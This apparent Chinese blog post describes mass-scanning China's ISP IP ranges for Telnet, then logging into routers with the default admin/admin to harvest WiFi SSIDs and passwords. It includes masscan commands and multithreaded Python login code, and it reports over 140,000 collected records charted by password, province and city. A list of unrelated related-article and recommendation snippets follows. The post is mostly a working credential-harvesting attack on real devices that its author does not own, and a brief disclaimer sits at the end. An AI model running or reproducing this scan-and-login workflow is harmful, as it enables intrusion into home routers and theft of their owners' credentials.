如何扫描统计全国Telnet默认口令
本文原创作者:zrools
本文中介绍的工具、技术带有一定的攻击性,请合理合法使用。
0×00 前言
在日常工作中,我们经常会遇到针对全国甚至针对全网对某一漏洞/安全事件做数据统计分析。这时我们该怎么做呢?在本文中,我将用Telnet弱口令给大家做示范希,望能唤起相关人员的安全意识,以提高网络空间的安全防御能力!
talk is cheap show me the code!
You say a JB without pictures?
0×01 准备数据
运营商IP段
在国内某网下载了国内运营商IP段数据(IPv4)
数据处理
下载回来每个运营商为一个txt文件,数据格式如下
183.0.0.0 183.63.255.255 4194304
36.96.0.0 36.127.255.255 2097152
49.64.0.0 49.95.255.255 2097152
113.64.0.0 113.95.255.255 2097152
115.192.0.0 115.223.255.255 2097152
180.96.0.0 180.127.255.255 2097152
183.128.0.0 183.159.255.255 2097152
220.160.0.0 220.191.255.255 2097152
14.16.0.0 14.31.255.255 1048576
14.112.0.0 14.127.255.255 1048576
将所有IP段合并为一个文件
awk '{print $1,$2}' *.txt | sort | uniq > ip.txt
将IP范围转为IP/掩码格式,主要是为了方便扫描软件载入
import netaddr with open("ip.txt", "r") as f:
for line in f:
ip = line.strip().split()
prx = netaddr.IPRange(ip[0],ip[1]).cidrs()[0].prefixlen
print(ip[0]+'/'+str(prx))
转换后格式
101.0.0.0/22
1.0.1.0/24
101.1.0.0/22
101.101.100.0/24
101.101.102.0/23
101.101.104.0/21
101.101.112.0/20
101.101.64.0/19
101.102.100.0/23
101.102.102.0/24
0×02 扫描
以下python版本为3.4
python 512线程直扫上行带宽约几百KB/s;直接上masscan、zmap这等扫描软件上行流量会暴走;具体要多少时间,可以拿少量数据测试算算!
2.1 使用python
使用python直接将IP按组遍历进队列,使用多线程循环扫描(也就是直接尝试登录),速度比较慢,但准确率相对较高
nloops = 256
ipQue = queue.Queue()
with open("ip.txt", "r") as f:
for line in f:
for ip in IPNetwork(line.strip().split()).iter_hosts():
ipQue.put(ip); # 调用多线
for i in range(nloops):
t = threading.Thread(target=getwifi) # getwifi 为任务方法
t.start()
threads.append(t) # 等待一轮扫描结束
for i in range(nloops):
threads[i].join() # 删掉已扫描的IP段,防止服务重启或中途断开重启动重复扫描
os.system("sed -i '/"+line.strip()+"/d' ip.txt")
2.2 使用masscan
先扫描得到23端口IP,然后一次性扔python进行多线程尝试登录,速度快,准确率较低,大致使用如下,具体参数自己定
masscan -p23 `sed ':a;N;$!ba;s/\n/ /g' ip.txt` --banners -oB port.txt
2.3 Telnet
尝试登录部分,直接try…except,超时、登录、读取任意一处超时或异常直接扔掉这个IP,具体超时时间自己看网络情况定
try:
t = telnetlib.Telnet(host, timeout=TIMEOUT)
t.read_until(b"username:", TIMEOUT)
t.write(b"admin\n")
t.read_until(b"password:", TIMEOUT)
t.write(b"admin\n")
t.write(b"wlctl show\n")
t.write(b"lan show info\n") # 获取BSSID
t.read_until(b"SSID", TIMEOUT)
strx = t.read_very_eager().decode('ascii')
t.close()
# 如果能获取信息,这里写处理代码(比如去重复插入数据库),strx为输出内容
except:
pass
2.4 IP信息
将存到数据库的记录循环抽取调用淘宝接口更新地区等信息
http://ip.taobao.com/service/getIpInfo.php?ip=1.1.1.1
0×03 统计
总共有多少IP没多记录,所以端口开放率及成功率没法去统计了
数据库是mysql后端php处理返回json,前端使用d3.js生成图表,数据表结构如下:
以上是去年测试的数据
一轮扫下来获取为wifi记录14W+,可从已扫描的有结果中提取IP处理成IP段继续扫描,效率会大大提高
以下是万恶的各种TOP
3.1 长度TOP
先来看看丧心病狂长度TOP10,请允许我打一下码:
3.2 频率最高的口令TOP
X标签没有那个是无口令
3.3 口令位数与出现频率关系
已去掉空口令统计,1~7位估计是口令中出现了变态字符导致截断了-_-#
3.4 运营商TOP
貌似加起来都不够10个 -_-#
3.5 省份TOP
3.6 城市TOP
看多了棒子图,看看其他图形展示
0×04 常见口令规则比例
将数据一次性提取遍历正则统计,规则按以下几项
- 空
- 纯数字(日期/生日-yyyymmdd & 手机号-11位 & 其他)
- 纯字符(纯小写 & 纯大写 & 其他)
- 混合型(含日期 & 含手机 & 其他)
鼠标经过颜色块,展示相应数据
4.1 所有城市展示
一次性将所有城市展示出来,使用鼠标滚轮方法缩小,左图为缩小图,右图为放大图 (全景图1、全景图2)
4.2 全国分布
最后来个千篇一律的全国分布图(鼠标经过展示数据)
暂时就这么多,有兴趣可以试试其他有趣的展现方式!
ps:以上仅供学习交流,乱搞造成一切后果与本人无关!
0×05 参考
- 具体python实现:http://92ez.com/?action=show&id=49
如何扫描统计全国Telnet默认口令的更多相关文章
- 漏洞利用 Exploit---利用默认口令、IP假冒、应用漏洞
漏洞利用 编辑 讨论 本词条由“科普中国”科学百科词条编写与应用工作项目 审核 . 漏洞利用(英语:Exploit,本意为“利用”)是计算机安全术语,指的是利用程序中的某些漏洞,来得到计算机的控制权( ...
- Telnet弱口令猜解【Python脚本】
telnet 弱口令猜解脚本 测试环境:window2003.centos7 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import telnetli ...
- 利用Axis2默认口令安全漏洞可入侵WebService网站
利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基 ...
- Python Telnet弱口令爆破脚本及遇到的错误与问题
写得时候遇到了一个很大的问题,就是我在发送用户名,接受用户名就会一直卡住.然后等了好久后提示 recv ‘\r\nSession timed out.\r\n\r\nTelnet Server has ...
- IPMI相关漏洞利用及WEB端默认口令登录漏洞
IPMI相关漏洞 0套件漏洞 使用0套件时,只需要Username,口令任意即可绕过身份鉴别执行指令.而且一般还有一个默认的账户admin或者ADMIN. 备注:IPMI是一套主机远程管理系统,可以远 ...
- 利用Axis2默认口令安全漏洞入侵WebService网站
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展.黑吧安全网Axis2默认口令 ...
- ctfhub技能树—密码口令—默认口令
打开靶机 查看页面内容 根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令 尝试登录 成功拿到flag
- Acunetix引入了Docker支持,扫描统计信息以及将漏洞发送到AWS WAF的功能
已针对Windows,Linux和macOS发布了新的Acunetix更新:14.2.210503151. 此Acunetix更新引入了Docker支持,针对每次扫描显示的新"扫描统计信息& ...
- 自古逢秋悲寂寥,奈何今秋热成雕?Python使用Pyecharts统计全国温度Top10并绘图
秋词-刘禹锡 自古逢秋悲寂寥, 我言秋日胜春朝. 晴空一鹤排云上, 便引诗情到碧霄. 古人谈及秋天,都是悲凉寂寥,那么-.我好想回到古代的秋天啊!明明到了秋天,为什么最近的气温比夏天还热. 之前做天气 ...
随机推荐
- JAVA Web学习笔记
JAVA Web学习笔记 1.JSP (java服务器页面) 锁定 本词条由“科普中国”百科科学词条编写与应用工作项目 审核 . JSP全名为Java Server Pages,中文名叫java服务器 ...
- MYSQL的SQL_CALC_FOUND_ROWS 和count(*)
mysql的SQL_CALC_FOUND_ROWS 和 count(*) 在很多分页的程序中都这样写: SELECT COUNT(*) from `table` WHERE ......; 查出符合 ...
- python学习之路,2018.8.9
python学习之路,2018.8.9, 学习是一个长期坚持的过程,加油吧,少年!
- CF322F
CF322F 拉格朗日插值 #include<iostream> #include<cstdio> #include<algorithm> #include< ...
- MVC中的自定义标签分页控件,仅供大家学习!!
public static HtmlString ShowPageNavigate(this HtmlHelper htmlHelper, int currentPage, int pageSize, ...
- SpringMVC学习(6):数据验证
在系列(4).(5)中我们展示了如何绑定数据,绑定完数据之后如何确保我们得到的数据的正确性?这就是我们本篇要说的内容 -> 数据验证. 这里我们采用Hibernate-validator来进行验 ...
- 七牛云关联Windows图床
1. 注册七牛云 七牛云 地址,需要在这里进行注册 2.完成实名认证 需要上传身份证的正反面以及支付宝做一下认证即可. 首先进入个人中心 然后进行实名认证 由于我已经认证过了,所以显示认证完成,未认证 ...
- 整合mybatis时报错:Configuration problem: Unable to locate Spring NamespaceHandler for XML schema namespace [http://www.springframework.org/schema/tx]
org.springframework.beans.factory.parsing.BeanDefinitionParsingException: Configuration problem: Una ...
- 2017-2018 ACM-ICPC, Asia Tsukuba Regional Contest E:Black or White
这道题可以比较容易看出是线性DP.设dp[i]代表把前i个格子刷成目标状态的最小步数. 写出状态转移方程 dp[i]=min( dp[j]+calc(j+1,i) ) (i-j<=k) calc ...
- Codeforces 1163D DP + KMP
题意:给你一个字符串s,以及两个字符串s1,s2.s中有些位置是*,意思是可以随便填字母,s的子串中如果出现一次s1,就加一分,如果出现一次s2,就减一分.问这个字符串s最多可以得多少分? 思路: 设 ...